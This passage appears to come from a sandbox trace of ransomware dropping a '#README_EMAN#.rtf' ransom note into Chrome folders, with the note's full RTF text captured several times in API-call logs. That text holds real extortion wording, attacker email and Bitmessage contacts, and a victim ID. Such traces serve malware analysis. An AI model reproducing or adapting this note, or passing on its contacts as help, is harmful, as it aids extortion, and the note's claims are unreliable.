y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x06", lpUsedDefaultChar=0x0) returned 8717 [0219.685] WriteFile (in: hFile=0x2b8, lpBuffer=0x2462dd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2462dd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0219.687] CloseHandle (hObject=0x2b8) returned 1 [0219.688] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\#readme_eman#.rtf")) returned 0x20 [0219.688] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\#readme_eman#.rtf")) returned 0x20 [0219.688] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\#readme_eman#.rtf")) returned 0x20 [0219.688] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\#readme_eman#.rtf")) returned 0xffffffff [0219.688] GetLastError () returned 0x2 [0219.688] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0220.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.344] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 